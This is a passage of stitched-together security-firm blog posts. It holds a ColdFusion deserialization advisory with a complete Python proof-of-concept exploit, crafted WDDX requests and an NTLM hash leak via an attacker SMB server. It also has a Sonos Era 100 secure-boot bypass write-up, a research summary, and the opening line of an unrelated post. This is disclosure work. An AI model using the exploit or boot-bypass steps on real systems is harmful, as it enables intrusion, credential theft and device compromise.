system by brute forcing the C:\Users\ or
/home/ directories.
File or directory enumeration could also be used to determine the
underlying operating system type and version. Changing the Central
Config Server’s environment to development or beta may increase the
attack surface of the server for further attacks. Finally, obtaining the
service account NTLM hash of the user running ColdFusion may be used to
tailor further attacks such as cracking the hash to a plaintext
password, or pass-the-hash
attacks.
Details
The deserialization attack has been discussed in detail previously by
Harsh Jaiswal in the blog post Adobe
ColdFusion Pre-Auth RCE(s). The vulnerabilities discussed in this
document are an extension of that attack, utilising packages which are
currently not in the default deny list.
Due to the constraints of the deserialization attack, the following
conditions must be met in order to execute a Java function within the
ColdFusion application:
The class must contain a public constructor with
zero arguments
The target function must begin with the word
set
The target function must not be
static
The target function must be
public
The target function must have one
argument
Multiple public non-static single argument set functions can be
chained in a single request
Must not exist in the cfusion/lib/serialfilter.txt deny
list
ColdFusion 2023 Update 3 contained the following
cfusion/lib/serialfilter.txt file contents:
Adhering to those restrictions, the following functions were
identified which provided an attacker useful information on the target
system.
File existence –
coldfusion.tagext.net.LdapTag.setClientCert
Directory existence –
coldfusion.tagext.io.cache.CacheTag.setDirectory
Set CCS cluster name –
coldfusion.centralconfig.client.CentralConfigClientUtil.setClusterName
Set CCS environment –
coldfusion.centralconfig.client.CentralConfigClientUtil.setEnv
The proof of concept coldfusion-wddx.py script has been
provided at the end of this post. The following examples use multiple IP
addresses which correspond to the following servers:
192.168.198.128 – Attacker controlled server
192.168.198.129 – Linux ColdFusion server
192.168.198.136 – Windows ColdFusion server
File
existence – coldfusion.tagext.net.LdapTag.setClientCert
The setClientCert function in the
CentralConfigClientUtil class could be remotely executed by
an unauthenticated attacker to perform multiple different attacks. The
function definition can be seen below:
public voidsetClientCert(String keystore) {if(!newFile(keystore).exists()) {throw newKeyStoreNotFoundException(keystore);}this.keystore = keystore;}
In this scenario, the attacker can control the keystore
string parameter from the crafted HTTP request. An example HTTP request
to exploit this vulnerability can be seen below:
Executing this function allows an attacker to check if a file on the
filesystem exists. If a file was present, the server would respond with
a HTTP status 500. However, if the file did not exist on the target
system, the server would respond with a HTTP status 200. This can be
seen using the provided coldfusion-wddx.py PoC script:
The Java File
specification states that the path can be a Microsoft Windows UNC
pathname. An attacker can therefore provide a UNC path of an attacker
controlled SMB server. This will cause the ColdFusion application to
connect to the attacker’s SMB server. Once the connection has occurred,
the NTLM hash of the ColdFusion service account will be leaked to the
attackers SMB server. However, the NTLM hash is only leaked if the
ColdFusion service is not running as the SYSTEM user. It
should be noted that by default, the ColdFusion service runs as the
SYSTEM user, however Adobe recommends hardening this in the
Adobe
ColdFusion 2021 Lockdown Guide in section “6.2 Create a Dedicated
User Account for ColdFusion”.
In the following example, the ColdFusion service has been hardened to
run as the coldfusion user, instead of the default
SYSTEM user.
An SMB server is hosted using smbserver.py
on the attacker’s machine:
The smbserver.py
output shows that the ColdFusion server connected to the attacker’s SMB
server, which resulted in the ColdFusion account Net-NTLMv2 hash being
leaked:
[*] Incoming connection (192.168.198.136,53483)
[*] AUTHENTICATE_MESSAGE (DESKTOP-J10AQ1P\coldfusion,DESKTOP-J10AQ1P)
[*] User DESKTOP-J10AQ1P\coldfusion authenticated successfully
[*] coldfusion::DESKTOP-J10AQ1P:aaaaaaaaaaaaaaaa:10a621e4f3b9a4b311ef62b45d3c94fd:0101000000000000808450406ecbd901702ffe4197ae622300000000010010006900790064006100520073004b004400030010006900790064006100520073004b0044000200100071004300780052007a005900410059000400100071004300780052007a0059004100590007000800808450406ecbd90106000400020000000800300030000000000000000000000000300000c23fddb9ebd5ba3c293612e488cfa07300752e0ee89205bfbdade370d11ab4520a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100390038002e003100320038000000000000000000
[*] Closing down connection (192.168.198.136,53483)
The hash can then be cracked using tools such as John the Ripper or Hashcat. As shown in the
following output, the coldfusion user had the Windows
account password of coldfusion.
Directory
existence – coldfusion.tagext.io.cache.CacheTag.setDirectory
Similar to file existence, it is also possible to determine if a
directory exists by leveraging the setDirectory function in
the CacheTag class. The function is defined as:
In this case, the directory variable can be controlled
by an unauthenticated request to the ColdFusion server. Once the
functionality has passed various helper methods, it checks whether the
directory exists or not and causes a HTTP error 500 when it does exist,
and a HTTP error 200 when it does not exist. An example HTTP request can
be seen below:
The helper function VSFileFactory.getFileObject uses the
Apache
Commons VFS Project for additional file system support. The list of
supported file systems can be seen in the
cfusion/lib/vfs-providers.xml file.
File System – HTTP/HTTPS
The HTTP(S) schemas allow you to perform a HTTP(S) HEAD request on
behalf of the ColdFusion server. In the following example, a HTTP server
is hosted on the attacker machine:
└─$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80(http://0.0.0.0:80/) ...
The request is then triggered with a path of the attacker’s web
server:
└─$ python3 coldfusion-wddx.py 192.168.198.129 directory-exist http://192.168.198.128/
[#] Target: http://192.168.198.129/CFIDE/wizards/common/utils.cfc?method=wizardHash inPassword=bar _cfclient=true
[-] Directory does not exist
This then causes a HTTP(S) HEAD request to be sent to the server:
The remaining supported filesystems were not tested, however it is
likely they can be used to enumerate directories for the given
filesystem.
Set
CCS Cluster Name –
coldfusion.centralconfig.client.CentralConfigClientUtil.setClusterName
It was possible to set the Central Config Server (CCS) Cluster Name
setting by executing the setClusterName function inside the
CentralConfigClientUtil class. The function is defined
as:
An attacker can control the cluster parameter and set
the cluster name to any value they choose. An example HTTP request to
trigger the vulnerability is shown below:
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash inPassword=foo _cfclient=true HTTP/1.1
Host: 192.168.198.129
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 216
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='xcoldfusion.centralconfig.client.CentralConfigClientUtilx'><var name='clusterName'><string>EXAMPLE</string></var></struct></data></wddxPacket>
Additionally, the provided PoC script can be used to simplify setting
the CCS cluster name:
└─$ python3 coldfusion-wddx.py 192.168.198.129 ccs-cluster-name EXAMPLE
[#] Target: http://192.168.198.129/CFIDE/wizards/common/utils.cfc?method=wizardHash inPassword=bar _cfclient=true
[+] Set CCS cluster name
Once the request has been processed by the ColdFusion server, the
clustername property in the
cfusion/lib/ccs/ccs.properties file is set to the attacker
controlled value, and the cluster name is used by the ColdFusion
server.
Set
CCS Environment –
coldfusion.centralconfig.client.CentralConfigClientUtil.setEnv
Similar to setting the CCS cluster name, an attacker can also set the
CCS environment by executing the setEnv function inside the
CentralConfigClientUtil class as shown below:
public voidsetEnv(String env) {if(ccsEnv.equals(env)) {return;}
ccsEnv = env;
CentralConfigClientUtil.storeCCSServerConfig();
CentralConfigRefreshServlet.reloadAllModules();}
An example HTTP request to execute this function with the attacker
controlled env variable can be seen below:
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash inPassword=foo _cfclient=true HTTP/1.1
Host: 192.168.198.129
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 212
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='xcoldfusion.centralconfig.client.CentralConfigClientUtilx'><var name='env'><string>development</string></var></struct></data></wddxPacket>
The PoC Python script command ccs-env automates sending
this request:
└─$ python3 coldfusion-wddx.py192.168.198.129 ccs-env EXAMPLE
[#] Target: http://192.168.198.129/CFIDE/wizards/common/utils.cfc?method=wizardHash inPassword=bar _cfclient=true
[+] Set CCS environment
Finally, the environment property in the
cfusion/lib/ccs/ccs.properties file has been changed to the
attacker controlled value.
Do not deserialize user-controlled data where possible. Especially in
instances where attackers can provide class names and functions which
result in remote code execution. The existing patch uses a deny list
which is not recommended, as it is not possible to list and filter all
possible attacks that could target the ColdFusion server. This is
especially so with the ability to load additional third-party Java files
which could be targeted.
Instead, if the deserialization is a critical part of functionality
which cannot be changed, an allow list should be used instead of a deny
list. This would allow you to carefully review and list the small number
of classes which can be used for this functionality, whilst minimising
the likelihood of an attack against these classes. Although an allow
list is a much better alternative to the deny list, it is still not a
secure solution as vulnerabilities may exist within the allowed classes.
Likewise, future changes and updates may occur within those vulnerable
classes that the developer may not be aware of.
coldfusion-wddx.py
The following proof of concept script “coldfusion-wddx.py” has been
provided to demonstrate the various vulnerabilities outlined in this
post.
import argparse
import requests
import sys
import enum
URL =None
VERBOSITY =NoneclassLogLevel(enum.Enum):
NONE =0
MINIMAL =1
NORMAL =2
DEBUG =3classExitStatus(enum.Enum):
SUCCESS =0
CONNECTION_FAILED =1
FUNCTION_MUST_BE_SET =2
DIRECTORY_NOT_FOUND =3
FILE_NOT_FOUND =4
FAIL_SET_CCS_CLUSTER_NAME =5
FAIL_SET_CCS_ENV =6# Log the msg to stdout if the verbosity level is >= the given leveldeflog(level, msg):if VERBOSITY.value >= level.value:print(msg)# Show a result and exitdefresultObj(obj):if VERBOSITY == LogLevel.MINIMAL and'minimal'in obj:log(LogLevel.MINIMAL, obj['minimal'])log(LogLevel.NORMAL, obj['normal'])
sys.exit(obj['status'].value)# Show a result and exit success/fail wrapperdefresult(code, successObj, failObj):# Success occurs when a server error occursif code ==500:returnresultObj(successObj)returnresultObj(failObj)# Build the WDDX Deserialization PacketdefgetPayload(cls, function, argument,type='string'):
name = function
# Validate the function begins with "set"if name[0:3] !='set':log(LogLevel.MINIMAL,'[-] Target function must begin with "set"!')
sys.exit(ExitStatus.FUNCTION_MUST_BE_SET.value)# Remove "set" prefix
name = function[3:]# Lowercase first letter
name = name[0].lower() + name[1:]return f"""<wddxPacket version='1.0'> <header/> <data> <struct type='x{cls}x'> <var name='{name}'> <{type}>{argument}</{type}> </var> </struct> </data></wddxPacket>"""# Perform the POST request to the ColdFusion serverdefrequest(cls, function, argument,type='string'):
payload =getPayload(cls, function, argument,type)log(LogLevel.DEBUG,'[#] Sending HTTP POST request with the following XML payload:')log(LogLevel.DEBUG, payload)try:
r = requests.post(URL, data={'argumentCollection': payload
}, headers={'Content-Type':'application/x-www-form-urlencoded'})log(LogLevel.DEBUG, f'[#] Retrieved HTTP status code{r.status_code}')return r.status_code
except requests.exceptions.ConnectionError:log(LogLevel.MINIMAL,'[-] Failed to connect to target ColdFusion server!')
sys.exit(ExitStatus.CONNECTION_FAILED.value)# Handle the execute commanddefexecute(classpath, method, argument,type):log(LogLevel.NORMAL, f'[#]')log(LogLevel.NORMAL, f'[!] Execute restrictions:')log(LogLevel.NORMAL, f'[!] * Class')log(LogLevel.NORMAL, f'[!] * Public constructor')log(LogLevel.NORMAL, f'[!] * No constructor arguments')log(LogLevel.NORMAL, f'[!] * Function')log(LogLevel.NORMAL, f'[!] * Name begins with "set"')log(LogLevel.NORMAL, f'[!] * Public')log(LogLevel.NORMAL, f'[!] * Not static')log(LogLevel.NORMAL, f'[!] * One argument')log(LogLevel.NORMAL, f'[#]')
code =request(classpath, method, argument,type)if VERBOSITY == LogLevel.MINIMAL:log(LogLevel.MINIMAL, f'{code}')log(LogLevel.NORMAL, f'[#] HTTP Code:{code}')
sys.exit(ExitStatus.SUCCESS.value if code ==500else code)# Handle the directory existence commanddefdirectoryExists(path):
code =request('coldfusion.tagext.io.cache.CacheTag','setDirectory', path)result(code, {'minimal':'valid','normal':'[+] Directory exists','status': ExitStatus.SUCCESS,}, {'minimal':'invalid','normal':'[-] Directory does not exist','status': ExitStatus.DIRECTORY_NOT_FOUND,})# Handle the file existence commanddeffileExists(path):
code =request('coldfusion.tagext.net.LdapTag','setClientCert', path)result(code, {'minimal':'valid','normal':'[+] File exists','status': ExitStatus.SUCCESS,}, {'minimal':'invalid','normal':'[-] File does not exist','status': ExitStatus.FILE_NOT_FOUND,})# Set CCS Cluster NamedefsetCCsClusterName(name):
code =request('coldfusion.centralconfig.client.CentralConfigClientUtil','setClusterName', name)result(code, {'minimal':'success','normal':'[+] Set CCS cluster name','status': ExitStatus.SUCCESS,}, {'minimal':'failed','normal':'[-] Failed to set CCS cluster name','status': ExitStatus.FAIL_SET_CCS_CLUSTER_NAME,})# Set CCS EnvironmentdefsetCcsEnv(env):
code =request('coldfusion.centralconfig.client.CentralConfigClientUtil','setEnv', env)result(code, {'minimal':'success','normal':'[+] Set CCS environment','status': ExitStatus.SUCCESS,}, {'minimal':'failed','normal':'[-] Failed to set CCS environment','status': ExitStatus.FAIL_SET_CCS_ENV,})defmain(args):global URL, VERBOSITY
# Build URL
URL = f'{args.protocol}://{args.host}:{args.port}{args.cfc}'# Set verbosityif args.verbosity =='none':
VERBOSITY = LogLevel.NONE
elif args.verbosity =='minimal':
VERBOSITY = LogLevel.MINIMAL
elif args.verbosity =='normal':
VERBOSITY = LogLevel.NORMAL
elif args.verbosity =='debug':
VERBOSITY = LogLevel.DEBUG
log(LogLevel.NORMAL, f'[#] Target:{URL}')# Executeif args.command =='execute':returnexecute(args.classpath, args.method, args.argument, args.type)# Directory Existenceif args.command =='directory-exist':returndirectoryExists(args.path)# File Existenceif args.command =='file-exist':returnfileExists(args.path)# Set CCS Cluster Nameif args.command =='ccs-cluster-name':returnsetCCsClusterName(args.name)# Set CCS Environmentif args.command =='ccs-env':returnsetCcsEnv(args.env)if __name__ =="__main__":
parser = argparse.ArgumentParser(description='')
parser.add_argument('host',help='The target server domain or IP address')
parser.add_argument('-p','--port',type=int, default=8500,help='The target web server port number (Default: 8500)')
parser.add_argument('-pr','--protocol', choices=['https','http'], default='http',help='The target web server protocol (Default: http)')
parser.add_argument('-c','--cfc', default='/CFIDE/wizards/common/utils.cfc?method=wizardHash inPassword=bar _cfclient=true',help='The target CFC path (Default: /CFIDE/wizards/common/utils.cfc?method=wizardHash inPassword=foo _cfclient=true)')
parser.add_argument('-v','--verbosity', choices=['none','minimal','normal','debug'], default='normal',help='The level of output (Default: normal)')
subparsers = parser.add_subparsers(required=True,help='Command', dest='command')# Execute
parserE = subparsers.add_parser('execute',help='Execute a specific class function')
parserE.add_argument('classpath',help='The target full class path (Example: coldfusion.centralconfig.client.CentralConfigClientUtil)')
parserE.add_argument('method',help='The set function to execute (Example: setEnv)')
parserE.add_argument('argument',help='The function argument to pass (Example: development)')
parserE.add_argument('-t','--type', default='string',help='The function argument type (Default: string)')# Directory Enumeration
parserD = subparsers.add_parser('directory-exist',help='Check if a directory exists on the target server')
parserD.add_argument('path',help='The absolute directory path (Examples: /tmp, C:/)')# File Enumeration
parserF = subparsers.add_parser('file-exist',help='Check if a file exists on the target server')
parserF.add_argument('path',help='The absolute file path (Examples: /etc/passwd, C:/Windows/win.ini)')# Set CCS Server Cluster Name
parserN = subparsers.add_parser('ccs-cluster-name',help='Set the Central Config Server cluster name')
parserN.add_argument('name',help='The absolute directory path (Example: _CF_DEFAULT)')# Set CCS Server Env
parserE = subparsers.add_parser('ccs-env',help='Set the Central Config Server environment')
parserE.add_argument('env',help='The absolute directory path (Example: development)')main(parser.parse_args())
Vendor Communication
2023-09-12: Disclosed vulnerability to Adobe
2023-09-12: Adobe opened vulnerability investigation
2023-11-15: Adobe published advisory APSB23-52
containing CVE-2023-44353
NCC Group is a global expert in cybersecurity and risk mitigation,
working with businesses to protect their brand, value and reputation
against the ever-evolving threat landscape. With our knowledge,
experience and global footprint, we are best placed to help businesses
identify, assess, mitigate respond to the risks they face. We are
passionate about making the Internet safer and revolutionising the way
in which organisations think about cybersecurity.
Research performed by Ilya Zhuravlev supporting the Exploit
Development Group (EDG).
The Era 100 is Sonos’s flagship device, released on March 28th 2023
and is a notable step up from the Sonos One. It was also one of the
target devices for Pwn2Own
Toronto 2023. NCC found multiple security weaknesses within the
bootloader of the device which could be exploited leading to root/kernel
code execution and full compromise of the device.
According to Sonos, the issues reported were patched in an update
released on the 15th of November with no CVE issued or public details of
the security weakness. NCC is not aware of the full scope of devices
impacted by this issue. Users of Sonos devices should ensure to apply
any recent updates.
To develop an exploit eligible for the Pwn2Own contest, the first
step is to dump the firmware, gain initial access to the firmware, and
perhaps even set up debugging facilities to assist in debugging any
potential exploits.
In this article we will document the process of analyzing the
hardware, discovering several issues and developing a persistent secure
boot bypass for the Sonos Era 100.
Exploitation was also chained with a previously disclosed exploit
by bl4sty to obtain EL3 code
execution and obtain cryptographic key material.
Initial recon
After opening the device, we quickly identified UART pins broken out
on the motherboard:
The pinout is TX, RX, GND, Vcc
We can now attach a UART adapter and monitor the boot process:
SM1:BL:511f6b:81ca2f;FEAT:B0F02990:20283000;POC:F;RCY:0;EMMC:0;READ:0;0.0;0.0;CHK:0;
bl2_stage_init 0x01
bl2_stage_init 0xc1
bl2_stage_init 0x02
/* Skipped most of the log here */
U-Boot 2016.11-S767-Strict-Rev0.10 (Oct 13 2022 - 09:14:35 +0000)
SoC: Amlogic S767
Board: Sonos Optimo1 Revision 0x06
Reset: POR
cpu family id not support!!!
thermal ver flag error!
flagbuf is 0xfa!
read calibrated data failed
SOC Temperature -1 C
I2C: ready
DRAM: 1 GiB
initializing iomux_cfg_i2c
register usb cfg[0][1] = 000000007ffabde0
MMC: SDIO Port C: 0
*** Warning - bad CRC, using default environment
In: serial
Out: serial
Err: serial
Init Video as 1920 x 1080 pixel matrix
Net: dwmac.ff3f0000
checking cpuid allowlist (my cpuid is 2b:0b:17:00:01:17:12:00:00:11:33:38:36:55:4d:50)...
allowlist check completed
Hit any key to stop autoboot: 0
pending_unlock: no pending DevUnlock
Image header on sect 0
Magic: 536f7821
Version 1
Bootgen 0
Kernel Offset 40
Kernel Checksum 78c13f6f
Kernel Length a2ba18
Rootfs Offset 0
Rootfs Checksum 0
Rootfs Length 0
Rootfs Format 2
Image header on sect 1
Magic: 536f7821
Version 1
Bootgen 2
Kernel Offset 40
Kernel Checksum 78c13f6f
Kernel Length a2ba18
Rootfs Offset 0
Rootfs Checksum 0
Rootfs Length 0
Rootfs Format 2
Both headers OK, bootgens 0 2
uboot: section-1 selected
boot_state 0
364 byte kernel signature verified successfully
JTAG disabled
disable_usb: DISABLE_USB_BOOT fuse already set
disable_usb: DISABLE_JTAG fuse already set
disable_usb: DISABLE_M3_JTAG fuse already set
disable_usb: DISABLE_M4_JTAG fuse already set
srk_fuses: not revoking any more SRK keys (0x1)
srk_fuses: locking SRK revocation fuses
Start the watchdog timer before starting the kernel...
get_kernel_config [id = 1, rev = 6] returning 22
## Loading kernel from FIT Image at 00100040 ...
Using 'conf@23' configuration
Trying 'kernel@1' kernel subimage
Description: Sonos Linux kernel for S767
Type: Kernel Image
Compression: lz4 compressed
Data Start: 0x00100128
Data Size: 9076344 Bytes = 8.7 MiB
Architecture: AArch64
OS: Linux
Load Address: 0x01080000
Entry Point: 0x01080000
Hash algo: crc32
Hash value: 2e036fce
Verifying Hash Integrity ... crc32+ OK
## Loading fdt from FIT Image at 00100040 ...
Using 'conf@23' configuration
Trying 'fdt@23' fdt subimage
Description: Flattened Device Tree Sonos Optimo1 V6
Type: Flat Device Tree
Compression: uncompressed
Data Start: 0x00a27fe8
Data Size: 75487 Bytes = 73.7 KiB
Architecture: AArch64
Hash algo: crc32
Hash value: adbd3c21
Verifying Hash Integrity ... crc32+ OK
Booting using the fdt blob at 0xa27fe8
Uncompressing Kernel Image ... OK
Loading Device Tree to 00000000417ea000, end 00000000417ff6de ... OK
Starting kernel ...
vmin:32 b5 0 0!
From this log, we can see that the boot process is very similar to
other Sonos devices. Moreover, despite the marking on the SoC and the
boot log indicating an undocumented Amlogic S767a chip, the first line
of the BootROM log containing “SM1” points us to S905X3, which has a
datasheet available.
Whilst it’s possible to interrupt the U-Boot boot process, Sonos has
gone through several rounds of boot hardening and by now the U-Boot
console is only accessible with a password that is stored hashed inside
the U-Boot binary. Additionally, the set of accessible U-Boot commands
is heavily restricted.
Dumping the eMMC
Continuing probing the PCB, it was possible to locate eMMC data pins
next in order to attempt an in-circuit eMMC dump. From previous
generations of Sonos devices, we knew that the data on the flash is
mostly encrypted. Nevertheless, an in-circuit eMMC connection would also
allow to rapidly modify the flash memory contents, without having to
take the chip off and put it back on every time.
By probing termination resistors and test points located in the
general area between the SoC and the eMMC chip, first with an
oscilloscope and then with a logic analyzer, it was possible to identify
several candidates for eMMC lines.
To perform an in-circuit dump, we have to connect CLK, CMD, DAT0 and
ground at the minimum. While CLK and CMD are pretty obvious from the
above capture, there are multiple candidates for the DAT0 pin. Moreover,
we could only identify 3 out of 4 data pins at this point. Fortunately,
after trying all 3 of these, it was possible to identify the following
connections:
Note that the extra pin marked as “INT” here is used to interrupt the
BootROM boot process. By connecting it to ground during boot, the
BootROM gets stuck trying to boot from SPINOR, which allows us to
communicate on the eMMC lines without interference.
From there, it was possible to dump the contents of eMMC and confirm
that the bulk of the firmware including the Linux rootfs was
encrypted.
Investigating U-Boot
While we were unable to get access to the Sonos Era 100 U-Boot binary
just yet, previous work on Sonos devices enabled us to obtain a
plaintext binary for the Sonos One U-Boot. At this point we were hoping
that the images would be mostly the same, and that a vulnerability
existed in U-Boot that could be exploited in a black-box manner
utilizing the eMMC read-write capability.
Several such issues were identified and are documented below.
Issue 1: Stored environment
Despite the device not utilizing the stored environment feature of
U-Boot, there’s still an attempt to load the environment from flash at
startup. This appears to stem from a misconfiguration where the
CONFIG_ENV_IS_NOWHERE flag is not set in U-Boot. As a
result, during startup it will try to load the environment from flash
offset 0x500000. Since there’s no valid environment there,
it displays the following warning message over UART:
*** Warning - bad CRC, using default environment
The message goes away when a valid environment is written to that
location. This enables us to set variables such as bootcmd,
essentially bypassing the password-protected Sonos U-Boot console.
However, as mentioned above, the available commands are heavily
restricted.
Issue 2: Unchecked setenv()
call
By default on the Sonos Era 100, U-Boot’s “bootcmd” is set to
“sonosboot”. To understand the overall boot process, it was possible to
reverse engineer the custom “sonosboot” handler. On a high level, this
command is responsible for loading and validating the kernel image after
which it passes control to the U-Boot “bootm” built-in. Because “bootm”
uses U-Boot environment variables to control the arguments passed to the
Linux kernel, “sonosboot” makes sure to set them up first before passing
control:
setenv("bootargs",(char*)kernel_cmdline);
There is however no check on the return value of this
setenv call. If it fails, the variable will keep its
previous value, which in our case is the value loaded from the stored
environment.
As it turns out, it is possible to make this setenv call
fail. A somewhat obscure feature of U-Boot allows marking
variables as read-only. For example, by setting
“.flags=bootargs:sr”, the “bootargs” variable becomes read-only and all
future writes without the H_FORCE flag fail.
All we have to do at this point to exploit this issue is to construct
a stored environment that first defines the “bootargs” value, and then
sets it as read-only by defining “.flags=bootargs:sr”. The execution of
“sonosboot” will then proceed into “bootm” and it will start the Linux
kernel with fully controlled command-line arguments.
One way to obtain code execution from there is to insert an
“initrd=0xADDR,0xSIZE” argument which will cause the Linux kernel to
load an initramfs from memory at the specified address, overriding the
built-in image.
Issue 3: Malleable firmware
image
The exploitation process described above, however, requires that
controlled data is placed at a known static address. One way it was
found to do that is to abuse the custom Sonos
image header. According to U-Boot logs, this is always loaded at
address 0x100000:
## Loading kernel from FIT Image at 00100040 ...
Using 'conf@23' configuration
Trying 'kernel@1' kernel subimage
Description: Sonos Linux kernel for S767
Type: Kernel Image
Compression: lz4 compressed
Data Start: 0x00100128
Data Size: 9076344 Bytes = 8.7 MiB
Architecture: AArch64
OS: Linux
Load Address: 0x01080000
Entry Point: 0x01080000
Hash algo: crc32
Hash value: 2e036fce
Verifying Hash Integrity ... crc32+ OK
The image header can be represented in pseudocode as follows:
The issue is that while the value of kernel_offset is
normally 0x40, it is not enforced by U-Boot. By setting the offset to a
higher value and then filling the empty space with arbitrary data, we
can place the data at a known fixed location in U-Boot memory while
ensuring that the signature check on the image still passes.
Combining all three issues outlined above, it is possible to achieve
persistent code execution within Linux under the /init process as the
“root” user.
Moreover, by inserting a kernel module this access can be escalated
to kernel-mode arbitrary code execution.
Epilogue
There’s just one missing piece and that is to dump the one time
programmable (OTP) data so that we can decrypt any future firmware.
Fortunately, the factory firmware that the device came pre-flashed with
does not contain a fix for the vulnerability disclosed in
https://haxx.in/posts/dumping-the-amlogic-a113x-bootrom/
From there, slight modifications are required to adjust the exploit
for the different EL3 binary of this device. The arbitrary read
primitive provided by the a113x-el3-pwn tool works as-is
and allows for the EL3 image to be dumped. With the adjusted exploit we
were then able to dump full OTP contents and decrypt any future firmware
update for this device.
Disclosure Timeline
Date
Action
2023-09-04
NCC reports issues to Sonos
2023-09-07
Sonos has triaged report and is investigating
2023-11-29
NCC queries Sonos for expected patch date
2023-11-29
Sonos informs NCC that they already shipped a patch on the 15th
Nov
2023-11-30
NCC queries why no release notes, CVE or credit for the issues
2023-12-01
NCC informs Sonos that technical details will be published the w/c
4th Dec
Vendor: Sonos
Vendor URL: https://www.sonos.com/
Versions affected:
* Confirmed 73.0-42060
Systems Affected: Sonos Era 100
Author: Ilya Zhuravlev
Advisory URL: Not provided by Sonos. Sonos state an update was released on 2023-11-15 which remediated the issue.
CVE Identifier: N/A
Risk: High
Summary
Sonos Era 100 is a smart speaker released in 2023. A vulnerability exists in the U-Boot component of the firmware which would allow for persistent arbitrary code execution with Linux kernel privileges. This vulnerability could be exploited either by an attacker with physical access to the device, or by obtaining write access to the flash memory through a separate runtime vulnerability.
Impact
An unsigned attacker-controlled rootfs may be loaded by the Linux kernel. This achieves a persistent bypass of the secure boot mechanism, providing early code execution within the Linux userspace under the /init process as the “root” user. It can be further escalated into kernel-mode arbitrary code execution by loading a custom kernel module.
Details
The implementation of the custom “sonosboot” command loads the kernel image, performs the signature check, and then passes execution to the built-in U-Boot “bootm” command. Since “bootm” uses the “bootargs” environment variable as Linux kernel arguments, the “sonosboot” command initializes it with a call to `setenv`:
setenv(“bootargs”,(char *)kernel_cmdline);
However, the return result of `setenv` is not checked. If this call fails, “bootargs” will keep its previous value and “bootm” will pass it to the Linux kernel.
On the Sonos Era 100 the U-Boot environment is loaded from the eMMC from address 0x500000. Whilst the factory image does not contain a valid U-Boot environment there, and we can confirm it through the presence of the “*** Warning – bad CRC, using default environment” warning message displayed on UART, it is possible to place a valid environment by directly writing to the eMMC with a hardware programmer.
There is a feature in U-Boot that allows setting environment variables as read-only. For example, setting “bootargs=something” and then “.flags=bootargs:sr” would make any future writes to “bootargs” fail. Thus, the Linux kernel will boot with an attacker-controlled “bootargs“.
As a result, it is possible to fully control the Linux kernel command line. From there, an adversary could append the “initrd=0xADDR,0xSIZE” option to load their own initramfs, overwriting the one embedded in the image.
By replacing the “/init” process it is then possible to obtain early persistent code execution on the device.
Recommendation
Consider setting CONFIG_ENV_IS_NOWHEREto disable loading of a U-boot environment from the flash memory.
Validate the return value of setenv and abort the boot process if the call fails.
Vendor Communication
Date
Communication
2023-09-04
Issue reported to vendor.
2023-09-07
Sonos has triaged report and is investigating.
2023-11-29
NCC queries Sonos for expected patch date.
2023-11-29
Sonos informs NCC that they already shipped a patch on the 15th Nov.
2023-11-30
NCC queries why there are no release notes, CVE, or credit for the issues.
2023-12-01
NCC informs Sonos that technical details will be published the w/c 4th Dec.
NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.
Over the past two years, our global cybersecurity research has been characterized by unparalleled depth, diversity, and dedication to safeguarding the digital realm. The highlights of our work not only signify our commitment to pushing the boundaries of cybersecurity research but also underscore the tangible impacts and positive change we bring to the technological landscape. This report is a summary of our public-facing security research findings from researchers at NCC Group between January 2022 and December 2023.
With the release of 18 public reports and presenting our work at over 32 international conferences and seminars, encompassing a variety of technology and cryptographic implementations, we have demonstrated our capacity to scrutinize and enhance key security functions. Notably, our collaborations with tech giants such as Google, Amazon Web Services (AWS), and Kubernetes underscore our pivotal role in fortifying the digital ecosystems of industry leaders.
Commercially, 2022 and 2023 saw us deliver over $3million in revenue in collaborative research engagement across various technologies and many sectors, increasingly across Artificial Intelligence (AI) and AI-based systems.
In our bid to democratize cybersecurity knowledge, we have released 21 open-source security tools and repositories. These invaluable tools have catalyzed efficiency gains across multiple domains of cybersecurity.
Our research has positioned us at the forefront of evolving cryptographic paradigms. With significant work in Post- Quantum Cryptography, Elliptic Curve Cryptography, and Blockchain security, we remain key players in shaping the future of digital privacy and security.
The meteoric rise of AI/ML applications has been matched by our intense focus on understanding their security dynamics. Our research in this arena has grown exponentially since 2022, providing critical insights into the strengths and vulnerabilities of these transformative technologies.
Modern cloud environments, coupled with rapid shifts in software development and deployment, have necessitated deep dives into their security mechanisms. Our outputs in this domain have been instrumental in pioneering robust cyber defense tactics for contemporary digital infrastructures. Our exhaustive studies into hardware vulnerabilities and Operating System security have set benchmarks in comprehending and countering potential threats.
The external presentation of our research, particularly by our Exploit Development Group (EDG), has won us accolades, most notably a third-place finish at the 2022 Pwn2Own Toronto competition. EDG’s work on exploiting consumer routers and enterprise printers has been ground-breaking. Ken Gannon and Ilyes Beghdadi successfully exploited the Xiaomi 13 Pro smartphone at the 2023 Pwn2Own Toronto competition, demonstrating our continued excellence in mobile security.
Our research has spanned several other pivotal areas including Vulnerability Detection Management, Reverse Engineering, Modern Networking Security, and Secure Programming Development. Unearthing over 69 security vulnerabilities across third party products, we’ve reinforced our commitment to digital safety through responsible and coordinated vulnerability disclosure. Each discovery, while highlighting potential threats, also underscores our unwavering dedication to proactively fortifying global digital infrastructures.
Our journey through 2022 and 2023 has been marked by rigorous research, collaboration, and an unwavering commitment to excellence. As we continue to gain intelligence, insight and to innovate, our role in shaping a secure digital future remains paramount.
As we look forward to the upcoming year, our excitement is at an all-time high, not just for the innovative projects and growth opportunities on the horizon, but also for the robust safety measures we are putting in place. Making our lives safe, both in our work environments and within our digital realms, remains a top priority. We are actively developing and executing research that leads to enhancing our cybersecurity protocols, introducing tools, and investing in exploring cutting-edge technology to ensure a secure and resilient infrastructure. Our commitment to creating a safer world for everyone is unwavering, and we believe these efforts will significantly contribute to a productive, secure, and successful year ahead for all of us.
This is the second Technical Advisory post in a series wherein I audit the security of popular Remote Monitoring and Management (RMM) tools. (First: Multiple Vulnerabilities in Faronics Insight).
